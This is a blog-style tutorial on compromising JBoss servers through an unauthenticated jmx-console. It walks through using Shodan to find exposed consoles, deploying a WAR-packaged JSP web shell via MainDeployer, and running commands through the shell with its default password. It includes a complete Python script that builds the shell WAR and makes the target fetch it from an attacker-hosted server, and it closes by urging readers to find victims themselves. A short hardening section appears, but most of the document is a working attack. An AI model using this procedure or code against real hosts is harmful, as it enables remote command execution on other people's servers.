“So many Shells in so little time”
What is JBoss?
JBoss Application Server (JBoss AS) is an open-source, cross-platform Java application server developed by JBoss, a division of Red Hat Inc. JBoss AS is an open-source implementation of Java 2 Enterprise Edition (J2EE) that is used for implementing Java applications and other Web-based applications and software.
JBoss ships with a web-accessible administration page, the JMX Console. Like Apache Tomcat Manager, it is often deployed with default, weak, or no credentials at all. Also like Tomcat Manager, it lets administrators (and therefore attackers) upload and deploy Web application ARchive (WAR) files remotely through this admin console.
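To make the “default, weak, or no credentials” point concrete, here is an added configuration example (not from the original post) showing the shape of the jmx-console security configuration in JBoss AS 4/5: `jmx-console.war/WEB-INF/web.xml` and `WEB-INF/jboss-web.xml`. In the weak form the security constraint is commented out (or limited to GET and POST, which lets other HTTP verbs bypass it, CVE-2010-0738); the hardened form enables the constraint for every verb and binds the application to a security domain. The role name, realm name and file paths are the ones these JBoss versions use; the user list in `conf/props/jmx-console-users.properties` (shipped as `admin=admin`) must also be changed.

```xml
<!-- WEB-INF/web.xml, weak (as shipped in many JBoss 4.x installs):
     the constraint is commented out, so /jmx-console/ needs no login.
     Even when uncommented, listing only GET and POST leaves HEAD and
     other verbs unprotected (CVE-2010-0738). -->
<!--
<security-constraint>
  <web-resource-collection>
    <web-resource-name>HtmlAdaptor</web-resource-name>
    <url-pattern>/*</url-pattern>
    <http-method>GET</http-method>
    <http-method>POST</http-method>
  </web-resource-collection>
  <auth-constraint><role-name>JBossAdmin</role-name></auth-constraint>
</security-constraint>
-->

<!-- WEB-INF/web.xml, hardened: constraint active, no http-method list,
     so every verb on every path requires the JBossAdmin role. -->
<security-constraint>
  <web-resource-collection>
    <web-resource-name>HtmlAdaptor</web-resource-name>
    <url-pattern>/*</url-pattern>
  </web-resource-collection>
  <auth-constraint><role-name>JBossAdmin</role-name></auth-constraint>
</security-constraint>
<login-config>
  <auth-method>BASIC</auth-method>
  <realm-name>JBoss JMX Console</realm-name>
</login-config>
<security-role><role-name>JBossAdmin</role-name></security-role>

<!-- WEB-INF/jboss-web.xml, hardened: without this element the constraint
     above has no login module behind it. The jmx-console domain reads
     conf/props/jmx-console-users.properties and jmx-console-roles.properties;
     replace the shipped admin=admin entry with a real credential. -->
<jboss-web>
  <security-domain>java:/jaas/jmx-console</security-domain>
</jboss-web>
```

When reviewing a JBoss host, check all three: the constraint, the security domain binding, and the contents of the users file. Any one of them missing or left at its shipped value produces the condition this post exploits.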
Vulnerable versions -
JBoss Application Server versions: 3, 4, 5 and 6.
Paths to Check -
Manually Exploiting JBoss jmx-console -
- Create the WAR file with our JSP shell
- Host the WAR file on a server
- Find a publicly accessible jmx-console
- Deploy the WAR file
- Access the JSP shell
Shodan Dorks -
Create the WAR file with our JSP shell -
I made a repository on GitHub with the WAR file: Mad-robot/Exploiting-jboss (“So many shells in so little time”).
The WAR file contains a JSP shell.
URL to access the shell -
Hosting the WAR file on a server -
I used Python to host it (SimpleHTTPServer is the Python 2 module; on Python 3 the same server is provided by http.server):
python -m SimpleHTTPServer 8000
Finding a publicly accessible jmx-console -
Using Shodan I found some.
It looks like this:
Deploy the WAR file -
Navigate to the JMX Console on the target host (http://IP:port/jmx-console/) and search for “service=MainDeployer”.
Use its “void deploy()” operation to deploy our WAR file. The operation takes a java.net.URL parameter, so enter your attack IP and the name of the WAR file as a URL in that field and click the “Invoke” button.
If it is successfully deployed, a message like the one below is shown:
Accessing the JSP shell -
The JSP shell on the target can be found at /fs/shell.jsp.
Note that the JSP shell from RedTeam Pentesting requires a password. By default the password is “secret”.
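The whole manual procedure above (build the WAR, confirm the console answers without credentials, invoke MainDeployer.deploy() with the URL of the hosted WAR, then call the shell) scripted in Python, as an added example that is not code from the original post or from the Mad-robot/Exploiting-jboss repository. It assumes the WAR is named fs.war so the shell lands at /fs/shell.jsp as in the post; the JSP inside it is a constructed stand-in for the RedTeam Pentesting shell (same pass/cmd parameters, not the same code); and the target and attacker URLs are placeholders. The deploy request uses the HtmlAdaptor's invokeOpByName form with an explicit argType, which is what the console's own “Invoke” button submits by method index; invokeOpByName avoids depending on that index, which varies between versions.

```python
"""Scripted jmx-console MainDeployer deployment (added example, not the post's code)."""
import io
import zipfile
from urllib.parse import urlencode, urljoin

# Constructed stand-in JSP shell: requires pass=<password>, runs cmd=<command>.
# Not the RedTeam Pentesting shell the post uses; only the URL shape matches.
JSP_SHELL = r'''<%@ page import="java.io.*" %><%
String pw = request.getParameter("pass");
String cmd = request.getParameter("cmd");
if ("secret".equals(pw) && cmd != null) {
  Process p = Runtime.getRuntime().exec(cmd);
  BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
  String line;
  while ((line = r.readLine()) != null) { out.println(line); }
}
%>'''

# Minimal deployment descriptor; older JBoss releases expect one in the WAR.
WEB_XML = ('<?xml version="1.0" encoding="UTF-8"?>\n'
           '<web-app xmlns="http://java.sun.com/xml/ns/j2ee" version="2.4"/>\n')


def build_war(jsp_name: str = "shell.jsp", jsp_source: str = JSP_SHELL) -> bytes:
    """Return WAR bytes with the JSP at the archive root and a minimal web.xml.
    Served as fs.war, the JSP is reachable at /fs/<jsp_name> after deployment."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("WEB-INF/web.xml", WEB_XML)
        z.writestr(jsp_name, jsp_source)
    return buf.getvalue()


def war_entries(war_bytes: bytes) -> list:
    """List the archive members (used to sanity-check the WAR before hosting it)."""
    return zipfile.ZipFile(io.BytesIO(war_bytes)).namelist()


def console_state(status: int, body: str) -> str:
    """Classify a GET /jmx-console/ response: is the console open to anyone?
    'JMX Agent View' is the title of the HtmlAdaptor index page."""
    if status == 401:
        return "auth-required"
    if status == 200 and "JMX Agent View" in body:
        return "open"
    return "not-exposed"


def deploy_request(target_url: str, war_url: str) -> str:
    """URL that invokes jboss.system:service=MainDeployer deploy(java.net.URL)
    through the HtmlAdaptor; war_url must be reachable from the target."""
    params = {
        "action": "invokeOpByName",
        "name": "jboss.system:service=MainDeployer",
        "methodName": "deploy",
        "argType": "java.net.URL",
        "arg0": war_url,
    }
    return urljoin(target_url, "/jmx-console/HtmlAdaptor") + "?" + urlencode(params)


def shell_url(target_url: str, cmd: str, password: str = "secret",
              context: str = "fs") -> str:
    """URL of the deployed shell, in the pass/cmd form the post uses."""
    return urljoin(target_url, f"/{context}/shell.jsp") + "?" + urlencode(
        {"pass": password, "cmd": cmd})


if __name__ == "__main__":
    # Placeholders (assumptions): attacker web server and target JBoss host.
    ATTACKER_URL = "http://10.0.0.9:8000/fs.war"
    TARGET_URL = "http://10.0.0.5:8080"
    with open("fs.war", "wb") as f:          # host this with: python -m http.server 8000
        f.write(build_war())
    print("WAR members:", war_entries(build_war()))
    print("deploy via:", deploy_request(TARGET_URL, ATTACKER_URL))
    print("then browse:", shell_url(TARGET_URL, cmd="id"))
```

Run it, serve fs.war from the directory it writes to, and request the printed deploy URL in a browser or with curl only after console_state() on the target's /jmx-console/ response returns "open"; a 401 means credentials are enforced and this path does not apply.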
Automating using JexBoss -
joaomatosf wrote an exploitation tool for JBoss Application Server and other Java platforms, frameworks and applications: JexBoss (joaomatosf/jexboss), a JBoss (and Java deserialization vulnerabilities) verify and exploitation tool.
python jexboss.py -host http://target_host:8080
An example of the deployed shell URL (target host redacted): http://<target>/fs/shell.jsp?pass=secret&cmd=dir
Go find some by yourself.